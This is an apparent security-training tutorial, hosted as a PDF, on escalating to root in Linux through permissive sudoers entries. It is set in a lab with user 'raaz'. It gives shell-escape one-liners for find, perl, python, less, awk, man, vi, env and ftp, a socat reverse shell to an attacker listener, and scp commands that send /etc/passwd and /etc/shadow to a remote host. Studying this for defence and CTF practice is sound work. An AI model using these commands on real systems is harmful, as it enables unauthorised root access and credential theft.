0% found this document useful (0 votes)
113 views24 pages

Abusing Sudo

This document discusses how to escalate privileges on a Linux system by configuring sudo permissions in the /etc/sudoers file. It provides examples of granting a user sudo access to specific commands like find, binary programs like perl and python, and assigning root privileges to allow executing commands as the root user without authentication. It then demonstrates how these sudo permissions can be exploited to spawn interactive root shells using those given commands.

Uploaded by

Ian Kamau
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
0% found this document useful (0 votes)
113 views24 pages

Abusing Sudo

This document discusses how to escalate privileges on a Linux system by configuring sudo permissions in the /etc/sudoers file. It provides examples of granting a user sudo access to specific commands like find, binary programs like perl and python, and assigning root privileges to allow executing commands as the root user without authentication. It then demonstrates how these sudo permissions can be exploited to spawn interactive root shells using those given commands.

Uploaded by

Ian Kamau
Copyright
© © All Rights Reserved
We take content rights seriously. If you suspect this is your content, claim it here.
Available Formats
Download as PDF, TXT or read online on Scribd
You are on page 1/ 24

Contents

Introduction ........................................................................................... 3
Sudoer File Syntax .................................................................................. 4
Traditional Method to assign Root Privilege ......................................... 5
Spawn Root Access ................................................................................. 6
Default Method to assign Root Privilege ............................................... 7
Spawn Root Access ................................................................................. 8
Allow Root Privilege to Binary commands............................................. 9
Spawn Root Access using Find Command ............................................ 10
Allow Root Privilege to Binary Programs ............................................. 11
Spawn shell using Perl .......................................................................... 11
Spawn shell using Python..................................................................... 12
Spawn shell using Less Command ........................................................ 12
Spawn shell using AWK ........................................................................ 13
Spawn shell using Man Command (Manual page)............................... 14
Spawn shell using Vi-editor (Visual editor) .......................................... 15
Allow Root Privilege to Shell Script ...................................................... 17
Spawn root shell by Executing Bash script ........................................... 19
Spawn root shell by Executing Python script ....................................... 19
Spawn root shell by Executing C Language script ................................ 20
Allow Sudo Right to other Programs ................................................... 20
Spawn Shell Using Env ......................................................................... 21
Spawn Shell Using FTP.......................................................................... 22
Spawn Shell Using Socat ...................................................................... 22
Spawn shell through SCP ...................................................................... 23

Page 2 of 23
Introduction
We've talked about Linux Privilege Escalation with SUID Binaries and the /etc/passwd file, and today we'll
talk about "Linux Privilege Escalation using Sudoers file." We always check root permissions for any user
to execute any file or command while completing CTF challenges for privilege escalation by using the sudo
-l command. You may learn about how we used this approach for privilege escalation.

A sudoers file in /etc is the configuration file for sudo rights in Linux and Unix. We've all heard of the sudo
command, which stands for Super User Do Root Privilege Task. The sudoers file stores the users and
groups that have root capabilities and can perform some or all commands as root or another user. Take a
look at the image below.

When you use sudo to run a command that requires root capabilities, Linux checks the sudoers file for
that specific account. And it came to the conclusion that the particular username is in the list of sudoers
files or not; if it isn't, you won't be able to use the sudo command to launch the command or program.
According to sudo permissions, the root user can perform ALL commands from ALL terminals while
masquerading as ALL users: ALL groups.

Page 3 of 23
Sudoer File Syntax
If you (the root user) want to grant sudo access to a specific user, use the visudo command to edit the
sudoers file. Under "user privilege specification," you'll see the usual root permission "root ALL=(ALL:ALL)
ALL," but there's also the Tag option, which is optional, as shown in the image below.
Consider the given example where we want to assign sudo rights to user:raaz to access the terminal and
run the copy command with root privileges. Here, the NOPASSWD tag means no password will be
requested for the user.
NOTE:

1. (ALL:ALL) can also represent as (ALL)


2. If you found (root) in place of (ALL:ALL) then it denotes that the user can run the command as
root.
3. If nothing is mentioned for the user/group then it means sudo defaults to the root user.

Let’s Begin!!
Let’s get in deep through practical work. First, create a user that should not be the sudo group user. We've
added the user "raaz," whose UID is 1002 and GID is 1002, making raaz a non-root user.

adduser raaz

Page 4 of 23
Traditional Method to assign Root Privilege
If the system administrator wants to grant all permissions to user raaz, he can do so by adding user raaz
to the User Privilege Specification category as shown below.

visudo
raaz ALL=(ALL:ALL) ALL
or
raaz ALL=(ALL) ALL

Page 5 of 23
Spawn Root Access
On the other hand, start your attacking machine and first compromise the target system, and then move
to the privilege escalation phase. Suppose you successfully log into the victim’s machine through SSH and
want to know the sudo rights for the current user, then execute the below command. In the traditional
method, the PASSWD option is enabled for user authentication while executing the above command, and
it can be disabled by using the NOPASSWD tag. The highlighted text indicates that the current user is
authorized to execute all commands. Therefore, we have obtained root access by executing the command.

ssh [email protected]
sudo -l
sudo su
id

Page 6 of 23
Default Method to assign Root Privilege
If the system administrator wants to give root permission to user raaz to execute all commands and
programs, then he can follow the below steps to add user raaz under the User Privilege Specification
category.

visudo
raaz ALL=ALL
or
raaz ALL=(root) ALL

Here also Default PASSWD option is enabled for authentication.

Page 7 of 23
Spawn Root Access
Again, compromise the target system and then move to the privilege escalation stage as done above, and
execute the below command to view the sudo user list.

ssh [email protected]
sudo -l

The highlighted text indicates that the user Raaz has the ability to run all commands as the root user.
Therefore, we can achieve root access by performing further steps.

sudo su
or
sudo bash

Note: Above both methods will ask user’s password for authentication at the time of execution of the
sudo -l command because by Default PASSWD option is enabled.

Page 8 of 23
Allow Root Privilege to Binary commands
The user may be given permission to run any file or command in a specific directory, such as /bin/cp,
/bin/cat, or /usr/bin/ find. This sort of permission results in privilege escalation for root access, and it can
be set up using the procedures below:

raaz ALL=(root) NOPASSWD: /usr/bin/find

NOTE: Here NOPASSWD tag that means no password will be requested for the authentication while
running sudo -l command.

Page 9 of 23
Spawn Root Access using Find Command
Again, compromised the victim’s system and then moved to the privilege escalation phase and executed
the below command to view the sudo user list.

sudo -l

At this point, you can notice the highlighted text is indicating that the user Raaz can run any command
through the find command. Therefore, we got root access by executing the below commands.

sudo find /home -exec /bin/bash \;


id

Page 10 of 23
Allow Root Privilege to Binary Programs
Sometimes admins assign delicate authority to a particular user to run binary programs that allow a user
to edit any system files, such as /etc/passwd, and so on. There are certain binary programs that can lead
to privilege escalation if authorized by a user. In the given below command, we have assigned sudo rights
to the following program, which can be run as a root user.

raaz ALL= (root) NOPASSWD: /usr/bin/perl, /usr/bin/python, /usr/bin/less, /usr/bin/awk,


/usr/bin/man, /usr/bin/vi

Spawn shell using Perl


At the time of privilege, the escalation phase executes the below command to view the sudo user list.

sudo -l

The highlighted text now indicates that the user Raaz has the ability to run Perl language programs or
scripts as the root user. Therefore, we got root access by executing a Perl one-liner.

Page 11 of 23
sudo perl -e 'exec "/bin/bash";'
id

Spawn shell using Python


After compromising the target system, move to the privilege escalation phase as done above, and execute
the below command to view the sudo user list.

sudo -l

At this point, you can see that the highlighted text indicates that the user raaz has the ability to run Python
language programs or scripts as the root user. Thus, we acquired root access by executing a Python one-
liner.

sudo python -c 'import pty;pty.spawn("/bin/bash")'


id

Spawn shell using Less Command


The privilege escalation phase executes the below command to view the sudo user list.

sudo -l

Page 12 of 23
Here you can observe the highlighted text, which indicates that the user raaz can run fewer commands as
a root user. Hence, we obtained root access by executing the following.

sudo less /etc/hosts


id

It will open the requested system file for editing, BUT for spawning root shell type !bash as shown below
and hit enter.
You will get root access as shown in the below image.

Spawn shell using AWK


After the compromise, the target system then moves to the privilege escalation phase as done above and
executes the below command to view the sudo user list.

sudo -l

At this point, you'll notice that the highlighted text indicates that the user raaz has the ability to run an
AWK language program or script as root. Therefore, we obtained root access by executing an AWK one-
liner.

sudo awk 'BEGIN {system("/bin/bash")}'


id

Page 13 of 23
Spawn shell using Man Command (Manual page)
For privilege escalation, execute the below command to view the sudo user list.

sudo -l

The highlighted text indicates that the user raaz has the ability to run the man command as root.
Therefore, we got root access by executing the following.

sudo man man

It will be displaying Linux manual pages for editing, BUT for spawning root shell type !bash as presented
below and hit enter, you get root access as done above using Less command.

Page 14 of 23
You will get root access as shown in the below image.

id
whoami

Spawn shell using Vi-editor (Visual editor)


After compromising the target system, move to the privilege escalation phase as done above and execute
the below command to view the sudo user list.

sudo -l

Here you can observe the highlighted text, which indicates that user raaz can run the vi command as root
user. Consequently, we got root access by executing the following.

sudo vi

Page 15 of 23
Thus, It will open vi editors for editing, BUT for spawning root shell type !bash as shown below and hit
enter, you get root access as done above using Less command.

You will get root access as shown in the below image.

sudo vi
id
whoami

NOTE: sudo permission for less, nano, man, vi, and man is very dangerous as they allow the user to edit
system files and lead to Privilege Escalation.

Page 16 of 23
Allow Root Privilege to Shell Script
There is a maximum chance of getting any kind of script for the system or program call. It can be any
script, either Bash, PHP, Python, or C language script. Suppose you (system admin) want to give sudo
permission to any script that will provide a bash shell on execution.
For example, we have some scripts which will provide a root terminal on execution. In the given below
image, you can observe that we have written three programs for obtaining a bash shell by using different
programming languages and saving all three files: asroot.py, asroot.sh, and asroot.c (compiled file shell)
inside bin/script.
NOTE: While solving OSCP challenges, you will find that some scripts are hidden by the author to exploit
kernels or root shells and set sudo permission to any particular user to execute that script.

cat asroot.py
cat asroot.sh
cat asroot.c
gcc asroot.c -o shell
chmod 777 shell
ls

Page 17 of 23
Now allow raaz to run all the above scripts as a root user by editing the sudoers file with the help of the
following command.

raaz ALL= (root) NOPASSWD: /bin/script/asroot.sh, /bin/script/asroot.py, /bin/script/shell

Page 18 of 23
Spawn root shell by Executing Bash script
For the privilege, the escalation phase executes the below command to view the sudo user list.

sudo -l

The highlighted text is indicating that the user raaz can run asroot.sh as the root user. Therefore, we got
root access by running asroot.sh script.

sudo /bin/script/asroot.sh
id

Spawn root shell by Executing Python script


Execute the below command for privilege escalation to view the sudo user list.

sudo -l

Page 19 of 23
At this time, the highlighted text shows that user raaz can run asroot.py as the root user. Therefore, we
acquired root access by executing the following script.

sudo /bin/script/asroot.py
id

Spawn root shell by Executing C Language script


After compromising the target system, move to privilege escalation and execute the below command to
view the sudo user list.

sudo -l

Here you can perceive that the highlighted text is indicating that the user raaz can run the shell (asroot.c
compiled file) as the root user. So, we obtained root access by executing the following shell:

sudo /bin/script/shell
id

Allow Sudo Right to other Programs


As we have seen above, some binary programs with sudo rights are helpful in getting root access. But
apart from that, there are some applications that can also provide root access if owned by sudo privilege,

Page 20 of 23
such as FTP or Socat. In the given below command, we have assigned sudo rights to the following program,
which can be run as a root user.

raaz ALL=(ALL) NOPASSWD: /usr/bin/env, /usr/bin/ftp, /usr/bin/scp, /usr/bin/socat

Spawn Shell Using Env


At the time of the privilege escalation phase, execute the below command to view the sudo user list.

sudo -l

As we can observe, user: raaz has sudo rights for env, FTP, SCP, and Socat. Let’s try to get root access
through them one-by-one.

sudo env /bin/bash


whoami

Page 21 of 23
Spawn Shell Using FTP
Now let’s try to get root access through FTP with the help of the following commands:

sudo ftp
whoami
or
! /bin/sh
id
whoami

Spawn Shell Using Socat


Now let’s try to get root access through socat with the help of the following commands. Execute the below
command on the attacker’s terminal in order to enable the listener for reverse connection.

socat file: `tty`,raw,echo=0 tcp-listen:1234


whoami

Then run the following command on the victim’s machine and you will get root access on your attacker's
machine.

sudo socat exec: 'sh -li',pty,stderr,setsid,sigint,sane tcp:192.168.1.105:1234

Page 22 of 23
Spawn shell through SCP
As we know, sudo right is available for SCP, but it is not possible to get the bash shell directory as shown
above because it is a means of securely moving any files between a local host and a remote host.
Therefore, we can use it for transferring those system files which require root permission to perform read
and write operations, such as /etc/passwd and /etc/shadow files.
Syntax: scp SourceFile user@host:~/path of the directory

sudo scp /etc/passwd [email protected]:~/


sudo scp /etc/shadow [email protected]:~/

Now let’s confirm the transformation by inspecting the remote directory and as you can observe we have
successfully received passwd and shadow files in our remote pc.

ls
cat shadow

Page 23 of 23
JOIN OUR
TRAINING PROGRAMS
H ERE
CLICK BEGINNER

Bug Bounty Network Security


Ethical Hacking Essentials

Network Pentest
Wireless Pentest

ADVANCED

Burp Suite Pro Web Pro Computer


Services-API Infrastructure VAPT Forensics

Advanced CTF
Android Pentest Metasploit

EXPERT

Red Team Operation

Privilege Escalation
APT’s - MITRE Attack Tactics
Windows
Active Directory Attack
Linux
MSSQL Security Assessment

www.ignitetechnologies.in

You might also like